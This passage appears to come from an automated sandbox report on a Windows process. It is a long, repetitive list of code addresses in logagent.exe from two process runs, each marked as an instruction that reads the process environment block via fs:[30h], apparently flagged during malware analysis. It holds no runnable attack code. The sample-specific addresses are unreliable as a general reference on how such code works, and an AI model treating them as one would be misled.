          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BDB40 mov eax, dword ptr fs:[00000030h]8_2_051BDB40
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CEF40 mov eax, dword ptr fs:[00000030h]8_2_051CEF40
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E3B7A mov eax, dword ptr fs:[00000030h]8_2_051E3B7A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E3B7A mov eax, dword ptr fs:[00000030h]8_2_051E3B7A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05288B58 mov eax, dword ptr fs:[00000030h]8_2_05288B58
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BDB60 mov ecx, dword ptr fs:[00000030h]8_2_051BDB60
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CFF60 mov eax, dword ptr fs:[00000030h]8_2_051CFF60
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C8794 mov eax, dword ptr fs:[00000030h]8_2_051C8794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2397 mov eax, dword ptr fs:[00000030h]8_2_051E2397
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05285BA5 mov eax, dword ptr fs:[00000030h]8_2_05285BA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EB390 mov eax, dword ptr fs:[00000030h]8_2_051EB390
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C1B8F mov eax, dword ptr fs:[00000030h]8_2_051C1B8F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C1B8F mov eax, dword ptr fs:[00000030h]8_2_051C1B8F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0526D380 mov ecx, dword ptr fs:[00000030h]8_2_0526D380
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527138A mov eax, dword ptr fs:[00000030h]8_2_0527138A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E4BAD mov eax, dword ptr fs:[00000030h]8_2_051E4BAD
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E4BAD mov eax, dword ptr fs:[00000030h]8_2_051E4BAD
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E4BAD mov eax, dword ptr fs:[00000030h]8_2_051E4BAD
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05237794 mov eax, dword ptr fs:[00000030h]8_2_05237794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05237794 mov eax, dword ptr fs:[00000030h]8_2_05237794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05237794 mov eax, dword ptr fs:[00000030h]8_2_05237794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052353CA mov eax, dword ptr fs:[00000030h]8_2_052353CA
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052353CA mov eax, dword ptr fs:[00000030h]8_2_052353CA
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F37F5 mov eax, dword ptr fs:[00000030h]8_2_051F37F5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DDBE9 mov eax, dword ptr fs:[00000030h]8_2_051DDBE9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]8_2_051E03E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]8_2_051E03E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]8_2_051E03E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]8_2_051E03E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]8_2_051E03E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]8_2_051E03E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D3A1C mov eax, dword ptr fs:[00000030h]8_2_051D3A1C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EA61C mov eax, dword ptr fs:[00000030h]8_2_051EA61C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EA61C mov eax, dword ptr fs:[00000030h]8_2_051EA61C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B5210 mov eax, dword ptr fs:[00000030h]8_2_051B5210
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B5210 mov ecx, dword ptr fs:[00000030h]8_2_051B5210
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B5210 mov eax, dword ptr fs:[00000030h]8_2_051B5210
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B5210 mov eax, dword ptr fs:[00000030h]8_2_051B5210
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BAA16 mov eax, dword ptr fs:[00000030h]8_2_051BAA16
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BAA16 mov eax, dword ptr fs:[00000030h]8_2_051BAA16
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C8A0A mov eax, dword ptr fs:[00000030h]8_2_051C8A0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0526FE3F mov eax, dword ptr fs:[00000030h]8_2_0526FE3F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BC600 mov eax, dword ptr fs:[00000030h]8_2_051BC600
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BC600 mov eax, dword ptr fs:[00000030h]8_2_051BC600
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BC600 mov eax, dword ptr fs:[00000030h]8_2_051BC600
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E8E00 mov eax, dword ptr fs:[00000030h]8_2_051E8E00
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271608 mov eax, dword ptr fs:[00000030h]8_2_05271608
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F4A2C mov eax, dword ptr fs:[00000030h]8_2_051F4A2C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F4A2C mov eax, dword ptr fs:[00000030h]8_2_051F4A2C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BE620 mov eax, dword ptr fs:[00000030h]8_2_051BE620
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0526B260 mov eax, dword ptr fs:[00000030h]8_2_0526B260
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0526B260 mov eax, dword ptr fs:[00000030h]8_2_0526B260
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05288A62 mov eax, dword ptr fs:[00000030h]8_2_05288A62
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]8_2_051B9240
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]8_2_051B9240
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]8_2_051B9240
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]8_2_051B9240
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]8_2_051C7E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]8_2_051C7E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]8_2_051C7E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]8_2_051C7E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]8_2_051C7E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]8_2_051C7E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527AE44 mov eax, dword ptr fs:[00000030h]8_2_0527AE44
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527AE44 mov eax, dword ptr fs:[00000030h]8_2_0527AE44
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F927A mov eax, dword ptr fs:[00000030h]8_2_051F927A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]8_2_051DAE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]8_2_051DAE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]8_2_051DAE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]8_2_051DAE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]8_2_051DAE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C766D mov eax, dword ptr fs:[00000030h]8_2_051C766D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527EA55 mov eax, dword ptr fs:[00000030h]8_2_0527EA55
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05244257 mov eax, dword ptr fs:[00000030h]8_2_05244257
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052346A7 mov eax, dword ptr fs:[00000030h]8_2_052346A7
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051ED294 mov eax, dword ptr fs:[00000030h]8_2_051ED294
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051ED294 mov eax, dword ptr fs:[00000030h]8_2_051ED294
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05280EA5 mov eax, dword ptr fs:[00000030h]8_2_05280EA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05280EA5 mov eax, dword ptr fs:[00000030h]8_2_05280EA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05280EA5 mov eax, dword ptr fs:[00000030h]8_2_05280EA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524FE87 mov eax, dword ptr fs:[00000030h]8_2_0524FE87
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CAAB0 mov eax, dword ptr fs:[00000030h]8_2_051CAAB0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CAAB0 mov eax, dword ptr fs:[00000030h]8_2_051CAAB0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EFAB0 mov eax, dword ptr fs:[00000030h]8_2_051EFAB0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]8_2_051B52A5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]8_2_051B52A5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]8_2_051B52A5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]8_2_051B52A5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]8_2_051B52A5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E36CC mov eax, dword ptr fs:[00000030h]8_2_051E36CC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2ACB mov eax, dword ptr fs:[00000030h]8_2_051E2ACB
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F8EC7 mov eax, dword ptr fs:[00000030h]8_2_051F8EC7
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0526FEC0 mov eax, dword ptr fs:[00000030h]8_2_0526FEC0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2AE4 mov eax, dword ptr fs:[00000030h]8_2_051E2AE4
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E16E0 mov ecx, dword ptr fs:[00000030h]8_2_051E16E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05288ED6 mov eax, dword ptr fs:[00000030h]8_2_05288ED6
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C76E2 mov eax, dword ptr fs:[00000030h]8_2_051C76E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C08CD6 mov eax, dword ptr fs:[00000030h]20_2_04C08CD6
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF4496 mov eax, dword ptr fs:[00000030h]20_2_04BF4496
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4849B mov eax, dword ptr fs:[00000030h]20_2_04B4849B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF14FB mov eax, dword ptr fs:[00000030h]20_2_04BF14FB
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6CF0 mov eax, dword ptr fs:[00000030h]20_2_04BB6CF0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6CF0 mov eax, dword ptr fs:[00000030h]20_2_04BB6CF0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6CF0 mov eax, dword ptr fs:[00000030h]20_2_04BB6CF0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6BC2C mov eax, dword ptr fs:[00000030h]20_2_04B6BC2C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6C0A mov eax, dword ptr fs:[00000030h]20_2_04BB6C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6C0A mov eax, dword ptr fs:[00000030h]20_2_04BB6C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6C0A mov eax, dword ptr fs:[00000030h]20_2_04BB6C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6C0A mov eax, dword ptr fs:[00000030h]20_2_04BB6C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1C06 mov eax, dword ptr fs:[00000030h]20_2_04BF1C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0740D mov eax, dword ptr fs:[00000030h]20_2_04C0740D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0740D mov eax, dword ptr fs:[00000030h]20_2_04C0740D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0740D mov eax, dword ptr fs:[00000030h]20_2_04C0740D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6AC7B mov eax, dword ptr fs:[00000030h]20_2_04B6AC7B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5746D mov eax, dword ptr fs:[00000030h]20_2_04B5746D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCC450 mov eax, dword ptr fs:[00000030h]20_2_04BCC450
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCC450 mov eax, dword ptr fs:[00000030h]20_2_04BCC450
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6A44B mov eax, dword ptr fs:[00000030h]20_2_04B6A44B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B61DB5 mov eax, dword ptr fs:[00000030h]20_2_04B61DB5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B61DB5 mov eax, dword ptr fs:[00000030h]20_2_04B61DB5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B61DB5 mov eax, dword ptr fs:[00000030h]20_2_04B61DB5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B635A1 mov eax, dword ptr fs:[00000030h]20_2_04B635A1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6FD9B mov eax, dword ptr fs:[00000030h]20_2_04B6FD9B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6FD9B mov eax, dword ptr fs:[00000030h]20_2_04B6FD9B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B62581 mov eax, dword ptr fs:[00000030h]20_2_04B62581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B62581 mov eax, dword ptr fs:[00000030h]20_2_04B62581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B62581 mov eax, dword ptr fs:[00000030h]20_2_04B62581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B62581 mov eax, dword ptr fs:[00000030h]20_2_04B62581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B32D8A mov eax, dword ptr fs:[00000030h]20_2_04B32D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B32D8A mov eax, dword ptr fs:[00000030h]20_2_04B32D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B32D8A mov eax, dword ptr fs:[00000030h]20_2_04B32D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B32D8A mov eax, dword ptr fs:[00000030h]20_2_04B32D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B32D8A mov eax, dword ptr fs:[00000030h]20_2_04B32D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2D82 mov eax, dword ptr fs:[00000030h]20_2_04BF2D82
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BE8DF1 mov eax, dword ptr fs:[00000030h]20_2_04BE8DF1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4D5E0 mov eax, dword ptr fs:[00000030h]20_2_04B4D5E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4D5E0 mov eax, dword ptr fs:[00000030h]20_2_04B4D5E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFFDE2 mov eax, dword ptr fs:[00000030h]20_2_04BFFDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFFDE2 mov eax, dword ptr fs:[00000030h]20_2_04BFFDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFFDE2 mov eax, dword ptr fs:[00000030h]20_2_04BFFDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFFDE2 mov eax, dword ptr fs:[00000030h]20_2_04BFFDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C005AC mov eax, dword ptr fs:[00000030h]20_2_04C005AC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C005AC mov eax, dword ptr fs:[00000030h]20_2_04C005AC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6DC9 mov eax, dword ptr fs:[00000030h]20_2_04BB6DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6DC9 mov eax, dword ptr fs:[00000030h]20_2_04BB6DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6DC9 mov eax, dword ptr fs:[00000030h]20_2_04BB6DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6DC9 mov ecx, dword ptr fs:[00000030h]20_2_04BB6DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6DC9 mov eax, dword ptr fs:[00000030h]20_2_04BB6DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB6DC9 mov eax, dword ptr fs:[00000030h]20_2_04BB6DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B43D34 mov eax, dword ptr fs:[00000030h]20_2_04B43D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B3AD30 mov eax, dword ptr fs:[00000030h]20_2_04B3AD30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFE539 mov eax, dword ptr fs:[00000030h]20_2_04BFE539
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BBA537 mov eax, dword ptr fs:[00000030h]20_2_04BBA537
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B64D3B mov eax, dword ptr fs:[00000030h]20_2_04B64D3B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B64D3B mov eax, dword ptr fs:[00000030h]20_2_04B64D3B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B64D3B mov eax, dword ptr fs:[00000030h]20_2_04B64D3B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5C577 mov eax, dword ptr fs:[00000030h]20_2_04B5C577
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5C577 mov eax, dword ptr fs:[00000030h]20_2_04B5C577
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B57D50 mov eax, dword ptr fs:[00000030h]20_2_04B57D50
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C08D34 mov eax, dword ptr fs:[00000030h]20_2_04C08D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B73D43 mov eax, dword ptr fs:[00000030h]20_2_04B73D43
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB3540 mov eax, dword ptr fs:[00000030h]20_2_04BB3540
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BE3D40 mov eax, dword ptr fs:[00000030h]20_2_04BE3D40
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C08ED6 mov eax, dword ptr fs:[00000030h]20_2_04C08ED6
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB46A7 mov eax, dword ptr fs:[00000030h]20_2_04BB46A7
